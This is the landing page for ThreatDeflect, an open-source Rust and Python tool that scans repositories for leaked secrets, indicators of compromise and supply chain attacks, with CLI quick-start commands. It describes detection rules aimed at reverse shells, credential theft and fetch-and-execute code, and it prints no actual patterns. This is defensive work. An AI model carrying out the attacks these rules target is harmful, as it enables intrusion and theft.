Open Source Threat Analysis Engine

Secret detection, IOC extraction, and supply chain attack identification. From reconnaissance to report, fully automated.

Star on GitHub Read Docs
Rust + Python | GPL-3.0 | crates.io | GUI + CLI
0+
Detection Rules
0
Deobfuscation Engines
0
Threat Intel APIs
0
Platforms

// Features

> Detection Engine

46 regex-based rules covering AWS keys, GitHub tokens, database credentials, reverse shells, crypto mining, and supply chain patterns.

> Confidence Scoring

Shannon entropy, file context classification, assignment detection, and placeholder filtering. Scores 0.0-1.0 with intelligent routing.

> Obfuscation Detection

Automatically decodes Base64, hex, URL-encoded, and character array obfuscated secrets and IOCs.

> Cross-Evidence Correlation

Crosses findings in the same file. Code that fetches external payload and executes it becomes a single HIGH severity alert.

> Threat Intel APIs

Integrates with VirusTotal, Shodan, AbuseIPDB, URLHaus, MalwareBazaar. All optional, works fully offline.

> Local AI Analysis

Summarize findings with Ollama. No data leaves your machine. Supports any local model.

// Quick Start

Rust Crate
cargo add threatdeflect-core

use threatdeflect_core::SecretAnalyzer;

let analyzer = SecretAnalyzer::new(rules, vec![])?;
let result = analyzer.analyze_content(
    content, "src/config.py", "config.py"
);
CLI Tool
# Install
pip install threatdeflect

# Scan a repository
threatdeflect repo https://github.com/org/repo

# Analyze IOCs
threatdeflect ioc 8.8.8.8 https://suspicious.com

# With AI summary
threatdeflect repo https://github.com/org/repo --ai llama3

// Architecture

ThreatDeflect GUI (Tkinter) CLI (Typer) Python Engine Correlation, AI, APIs Rust Core (PyO3) Regex, Entropy, Decode threatdeflect-core crates.io